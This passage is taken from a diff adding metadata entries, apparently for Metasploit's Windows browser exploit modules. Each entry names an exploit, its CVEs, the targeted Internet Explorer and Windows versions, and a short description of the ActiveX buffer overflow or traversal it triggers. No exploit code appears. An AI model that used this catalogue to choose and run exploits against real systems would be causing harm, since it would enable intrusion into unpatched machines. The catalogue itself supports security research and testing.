"/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_getdriversettings_2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_target_frame": { + "name": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_target_frame", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-08", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", + "references": [ + "CVE-2009-1568", + "BID-37242", + "OSVDB-60803", + "URL-http://web.archive.org/web/20091213033630/http://secunia.com:80/advisories/37169" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iPrint 5.30 Windows Client" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_target_frame.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_target_frame", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ntr_activex_check_bof": { + "name": "NTR ActiveX Control Check() Method Buffer Overflow", + "fullname": "exploit/windows/browser/ntr_activex_check_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-11", + "type": "exploit", + "author": [ + "Carsten Eiram", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in NTR ActiveX 1.1.8. The\n vulnerability exists in the Check() method, due to the insecure usage of strcat to\n build a URL using the bstrParams parameter contents (note: this is also the reason\n why the module won't allow you to modify the URIPATH), which leads to code execution\n under the context of the user visiting a malicious web page. In order to bypass\n DEP and ASLR on Windows Vista and Windows 7 JRE 6 is needed.", + "references": [ + "CVE-2012-0266", + "OSVDB-78252", + "BID-51374", + "URL-http://web.archive.org/web/20120514113631/http://secunia.com/secunia_research/2012-1/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/ntr_activex_check_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/ntr_activex_check_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ntr_activex_stopmodule": { + "name": "NTR ActiveX Control StopModule() Remote Code Execution", + "fullname": "exploit/windows/browser/ntr_activex_stopmodule", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-11", + "type": "exploit", + "author": [ + "Carsten Eiram", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The\n vulnerability exists in the StopModule() method, where the lModule parameter is\n used to dereference memory to get a function pointer, which leads to code execution\n under the context of the user visiting a malicious web page.", + "references": [ + "CVE-2012-0267", + "OSVDB-78253", + "BID-51374", + "URL-http://web.archive.org/web/20120122095846/http://secunia.com:80/secunia_research/2012-2" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 7 on Windows Vista" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/ntr_activex_stopmodule.rb", + "is_install_path": true, + "ref_name": "windows/browser/ntr_activex_stopmodule", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/oracle_autovue_setmarkupmode": { + "name": "Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow", + "fullname": "exploit/windows/browser/oracle_autovue_setmarkupmode", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-18", + "type": "exploit", + "author": [ + "Brian Gorenc", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.\n The vulnerability, due to the insecure usage of an strcpy like function in the\n SetMarkupMode method, when handling a specially crafted sMarkup argument, allows\n to trigger a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.\n\n The module has been successfully tested against Oracle AutoVue Desktop Version\n 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed to DEP and\n ASLR bypass).", + "references": [ + "CVE-2012-0549", + "BID-53077", + "OSVDB-81439", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05", + "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html", + "URL-https://www.rapid7.com/blog/post/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3 / Windows Vista SP2", + "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2", + "IE 9 with Java 6 on Windows 7 SP1" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb", + "is_install_path": true, + "ref_name": "windows/browser/oracle_autovue_setmarkupmode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/oracle_dc_submittoexpress": { + "name": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/oracle_dc_submittoexpress", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-08-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-4607", + "OSVDB-38335", + "BID-25467", + "US-CERT-VU-281977" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb", + "is_install_path": true, + "ref_name": "windows/browser/oracle_dc_submittoexpress", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/oracle_webcenter_checkoutandopen": { + "name": "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/oracle_webcenter_checkoutandopen", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-04-16", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in the Oracle WebCenter Content\n CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where\n user controlled input is used to call ShellExecuteExW(). This module abuses the\n control to execute an arbitrary HTA from a remote location. This module has been\n tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle\n WebCenter Content 11.1.1.6.0.", + "references": [ + "CVE-2013-1559", + "OSVDB-92386", + "BID-59122", + "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html", + "ZDI-13-094" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb", + "is_install_path": true, + "ref_name": "windows/browser/oracle_webcenter_checkoutandopen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/orbit_connecting": { + "name": "Orbit Downloader Connecting Log Creation Buffer Overflow", + "fullname": "exploit/windows/browser/orbit_connecting", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an\n attacker serves up a malicious web site, arbitrary code may be executed.\n The PAYLOAD windows/shell_bind_tcp works best.", + "references": [ + "CVE-2009-0187", + "OSVDB-52294", + "BID-33894" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/orbit_connecting.rb", + "is_install_path": true, + "ref_name": "windows/browser/orbit_connecting", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ovftool_format_string": { + "name": "VMWare OVF Tools Format String Vulnerability", + "fullname": "exploit/windows/browser/ovftool_format_string", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-08", + "type": "exploit", + "author": [ + "Jeremy Brown", + "juan vazquez " + ], + "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", + "references": [ + "CVE-2012-3569", + "OSVDB-87117", + "BID-56468", + "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VMWare OVF Tools 2.1 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/ovftool_format_string.rb", + "is_install_path": true, + "ref_name": "windows/browser/ovftool_format_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/pcvue_func": { + "name": "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability", + "fullname": "exploit/windows/browser/pcvue_func", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-10-05", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "mr_me ", + "TecR0c " + ], + "description": "This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.\n By setting a dword value for the SaveObject() or LoadObject(), an attacker can\n overwrite a function pointer and execute arbitrary code.", + "references": [ + "CVE-2011-4044", + "OSVDB-77561", + "BID-49795", + "URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer 6 / Internet Explorer 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/pcvue_func.rb", + "is_install_path": true, + "ref_name": "windows/browser/pcvue_func", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/persits_xupload_traversal": { + "name": "Persits XUpload ActiveX MakeHttpRequest Directory Traversal", + "fullname": "exploit/windows/browser/persits_xupload_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-29", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a directory traversal in Persits Software Inc's\n XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n By passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n an attacker is able to write arbitrary files to arbitrary locations on disk.\n\n Code execution occurs by writing to the All Users Startup Programs directory.\n You may want to combine this module with the use of exploit/multi/handler since a\n user would have to log for the payload to execute.", + "references": [ + "CVE-2009-3693", + "OSVDB-60001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/persits_xupload_traversal.rb", + "is_install_path": true, + "ref_name": "windows/browser/persits_xupload_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/quickr_qp2_bof": { + "name": "IBM Lotus QuickR qp2 ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/quickr_qp2_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-23", + "type": "exploit", + "author": [ + "Gaurav Baruah", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the qp2.dll installed with the IBM Lotus Quickr product.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module\n msvcr71.dll is used. This one is installed with the qp2 ActiveX.", + "references": [ + "CVE-2012-2176", + "OSVDB-82166", + "BID-53678", + "ZDI-12-134", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/quickr_qp2_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/quickr_qp2_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/real_arcade_installerdlg": { + "name": "Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution", + "fullname": "exploit/windows/browser/real_arcade_installerdlg", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-03", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The \"exec\"\n function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n on the victim machine.", + "references": [ + "OSVDB-71559", + "EDB-17105" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb", + "is_install_path": true, + "ref_name": "windows/browser/real_arcade_installerdlg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_cdda_uri": { + "name": "RealNetworks RealPlayer CDDA URI Initialization Vulnerability", + "fullname": "exploit/windows/browser/realplayer_cdda_uri", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-11-15", + "type": "exploit", + "author": [ + "bannedit ", + "sinn3r " + ], + "description": "This module exploits an initialization flaw within RealPlayer 11/11.1 and\n RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object\n initialization failure. However, this failure is improperly handled and\n uninitialized memory executed.", + "references": [ + "CVE-2010-3747", + "OSVDB-68673", + "BID-44144", + "ZDI-10-210", + "URL-http://service.real.com/realplayer/security/10152010_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "RealPlayer SP 1.0 - 1.1.4 Universal", + "RealPlayer 11.0 - 11.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_cdda_uri.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_cdda_uri", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_console": { + "name": "RealPlayer rmoc3260.dll ActiveX Control Heap Corruption", + "fullname": "exploit/windows/browser/realplayer_console", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-03-08", + "type": "exploit", + "author": [ + "Elazar Broad " + ], + "description": "This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n By sending a specially crafted string to the 'Console' property\n in the rmoc3260.dll control, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-1309", + "OSVDB-42946", + "BID-28157", + "URL-http://web.archive.org/web/20080313103656/http://secunia.com:80/advisories/29315/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/realplayer_console.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_console", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_import": { + "name": "RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow", + "fullname": "exploit/windows/browser/realplayer_import", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-10-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-5601", + "OSVDB-41430", + "BID-26130" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE / RealOne Player 2 (6.0.11.853)", + "IE / RealPlayer 10.5 (6.0.12.1483)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_import.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_import", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_qcp": { + "name": "RealNetworks Realplayer QCP Parsing Heap Overflow", + "fullname": "exploit/windows/browser/realplayer_qcp", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-08-16", + "type": "exploit", + "author": [ + "Sean de Regge", + "juan vazquez " + ], + "description": "This module exploits a heap overflow in Realplayer when handling a .QCP file.\n The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is\n allocated on the heap and user-supplied data from the file is copied within a\n memory copy loop.\n\n This allows a remote attacker to execute arbitrary code running in the context\n of the web browser via a .QCP file with a specially crafted \"fmt\" chunk.\n At this moment this module exploits the flaw on Windows XP IE6, IE7.", + "references": [ + "CVE-2011-2950", + "OSVDB-74549", + "BID-49172", + "ZDI-11-265", + "URL-http://service.real.com/realplayer/security/08162011_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6 on XP SP3", + "Internet Explorer 7 on XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_qcp.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_qcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/realplayer_smil": { + "name": "RealNetworks RealPlayer SMIL Buffer Overflow", + "fullname": "exploit/windows/browser/realplayer_smil", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-03-01", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n By creating a URL link to a malicious SMIL file, a remote attacker could\n overflow a buffer and execute arbitrary code.\n When using this module, be sure to set the URIPATH with an extension of '.smil'.\n This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n build 6.0.9.584.", + "references": [ + "CVE-2005-0455", + "OSVDB-14305", + "BID-12698" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "RealPlayer 10/8 on Windows 2000 SP0-SP4 English", + "RealPlayer 10/8 on Windows XP PRO SP0-SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/realplayer_smil.rb", + "is_install_path": true, + "ref_name": "windows/browser/realplayer_smil", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/roxio_cineplayer": { + "name": "Roxio CinePlayer ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/roxio_cineplayer", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-04-11", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n By setting an overly long value to 'DiskType', an attacker can overrun\n a buffer and execute arbitrary code.", + "references": [ + "CVE-2007-1559", + "OSVDB-34779", + "BID-23412" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/roxio_cineplayer.rb", + "is_install_path": true, + "ref_name": "windows/browser/roxio_cineplayer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/safari_xslt_output": { + "name": "Apple Safari Webkit libxslt Arbitrary File Creation", + "fullname": "exploit/windows/browser/safari_xslt_output", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-07-20", + "type": "exploit", + "author": [ + "Nicolas Gregoire" + ], + "description": "This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.", + "references": [ + "CVE-2011-1774", + "OSVDB-74017", + "URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/safari_xslt_output.rb", + "is_install_path": true, + "ref_name": "windows/browser/safari_xslt_output", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/samsung_neti_wiewer_backuptoavi_bof": { + "name": "Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow", + "fullname": "exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed\n with the Samsung NET-i viewer 1.37.\n\n Specifically, when supplying a long string for the fname parameter to the\n BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer\n overflow due to the use of memcpy with an incorrect size, resulting in remote code\n execution under the context of the user.", + "references": [ + "CVE-2012-4333", + "OSVDB-81453", + "BID-53193", + "URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/samsung_neti_wiewer_backuptoavi_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/samsung_security_manager_put": { + "name": "Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution", + "fullname": "exploit/windows/browser/samsung_security_manager_put", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-08-05", + "type": "exploit", + "author": [ + "mr_me " + ], + "description": "This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481\n by exploiting the vulnerability against the client-side. This exploit has been tested successfully using\n IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. Finally\n a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.", + "references": [ + "URL-http://www.zerodayinitiative.com/advisories/ZDI-15-156/", + "URL-http://www.zerodayinitiative.com/advisories/ZDI-16-481/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Samsung Security Manager 1.32 & 1.4 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/samsung_security_manager_put.rb", + "is_install_path": true, + "ref_name": "windows/browser/samsung_security_manager_put", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/sapgui_saveviewtosessionfile": { + "name": "SAP AG SAPgui EAI WebViewer3D Buffer Overflow", + "fullname": "exploit/windows/browser/sapgui_saveviewtosessionfile", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-03-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n with SAPgui. When passing an overly long string the SaveViewToSessionFile()\n method, arbitrary code may be executed.", + "references": [ + "CVE-2007-4475", + "OSVDB-53066", + "US-CERT-VU-985449" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb", + "is_install_path": true, + "ref_name": "windows/browser/sapgui_saveviewtosessionfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/siemens_solid_edge_selistctrlx": { + "name": "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/siemens_solid_edge_selistctrlx", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-26", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.\n The vulnerability exists on several APIs provided by the control, where user supplied input\n is handled as a memory pointer without proper validation, allowing an attacker to read and\n corrupt memory from the target process. This module abuses the methods NumChildren() and\n DeleteItem() in order to achieve memory info leak and remote code execution respectively.\n This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,\n using Solid Edge 10.4.", + "references": [ + "OSVDB-93696", + "EDB-25712" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb", + "is_install_path": true, + "ref_name": "windows/browser/siemens_solid_edge_selistctrlx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/softartisans_getdrivename": { + "name": "SoftArtisans XFile FileManager ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/softartisans_getdrivename", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-08-25", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-1682", + "OSVDB-47794", + "US-CERT-VU-914785", + "BID-30826" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/softartisans_getdrivename.rb", + "is_install_path": true, + "ref_name": "windows/browser/softartisans_getdrivename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/sonicwall_addrouteentry": { + "name": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", + "fullname": 